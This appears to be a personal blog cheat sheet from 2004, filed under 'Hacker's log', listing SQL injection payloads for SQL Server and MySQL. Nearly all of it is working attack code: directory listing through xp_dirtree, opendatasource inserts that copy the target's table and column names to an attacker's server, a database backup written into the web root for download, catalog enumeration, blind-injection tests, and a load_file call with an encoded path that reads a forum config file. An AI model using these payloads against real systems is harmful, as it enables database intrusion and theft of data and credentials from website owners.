CSDN博客

img net0r

Some useful techniques in sql injection [个人总结简洁版]

发表于2004/7/16 16:57:00  747人阅读

分类: 我的收藏-->Hacker's log

1.a.  create table dirs (dir varchar(100),dirid int)
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)

-------
b.   set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir

------or

alter table dirs add num int identity constraint num primary key

select  top  1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc

c. create table tmptable ( name char(200),id int not null)

insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --

select *  into [tmpcolumns]from syscolumns where 1=2

insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'

declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// 例如:e:/web/down.bak;--

2.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)

select col_name(oject_id('你要获取字段的表名'),[1,2,..])
select current_user,user,user_name(),system_user

DECLARE m  scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m

3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset

http://whois.webhosting.info

4.select case 1+1 when 1 then '1' else '0' end;

select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0

select if(STRCMP('net0r','netor1'),'not netor','is netor');

SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'

0 0

相关博文

我的热门文章

img
取 消
img